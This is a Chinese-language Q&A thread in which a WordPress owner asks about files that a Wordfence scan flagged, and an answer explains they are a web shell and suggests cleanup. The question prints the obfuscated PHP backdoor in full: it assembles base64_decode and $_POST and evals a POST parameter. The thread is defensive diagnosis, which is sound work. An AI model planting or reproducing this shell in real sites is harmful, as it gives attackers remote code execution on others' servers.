Wordpress漏洞警报

Question

我刚刚运行了插件Wordfence，它给了我一些问题来解决。

有两组代码具有相同的悬念代码：

File appears to be malicious: wp-admin/cache/alias90.php
File appears to be malicious: wp-content/languages/plugins/title.php
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/lib.php
File appears to be malicious: wp-includes/js/tinymce/utils/blog.php
File appears to be malicious: wp-content/uploads/2013/start24.php

描述说:这个文件似乎是由黑客安装来执行恶意活动的。如果您知道此文件，您可以选择忽略它，以排除它在未来的扫描。我们在此文件中找到的与已知恶意文件匹配的文本为："@$GLOBALS[$GLOBALS'y23c'.$GLOBALS'y23c'.$GLOBALS'y23c'".

第二组：

File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/gallery.php.suspected
File appears to be malicious: wp-content/themes/themename/languages/dump.php.suspected
File appears to be malicious: wp-content/uploads/2013/05/help.php.suspected
File appears to be malicious: wp-content/uploads/2014/04/model.php.suspected
File appears to be malicious: wp-content/uploads/2015/06/blog.php.suspected

其中的描述是:此文件似乎是由黑客安装以执行恶意活动。如果您知道此文件，您可以选择忽略它，以排除它在未来的扫描。我们在这个文件中找到的匹配已知恶意文件的文本是：“strtolower($sF4.$sF5.$sF9)”。

我该怎么处理这些文件？他们真的是恶意软件吗？

编辑:第二组中的文件具有以下代码

<?php 
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n726b60'])) {
    eval($s21(${$s20}['n726b60']));
}
?>

EDIT2:我对代码进行了评估，并将其返回如下：

base64_decode($_POST['n726b60']);

这有危险吗？

Answer 1

它是一个shell，用于在服务器上运行恶意代码。它们通常通过在线机器人上传到您的服务器，这些机器人会扫描站点以查找易受攻击的wordpress插件。本质上，shell代码允许他们使用$_POST函数根据eval变量的输入运行代码。

我在一个客户端wordpress网站上设置了这个插件，他们有大量的不必要的插件应该被禁用+删除。

我会认真考虑通过谷歌检查你所有的wordpress插件，看看你是否能找到任何公开发布的漏洞。此外，尝试遍历所有目录并删除类似于这些目录的文件。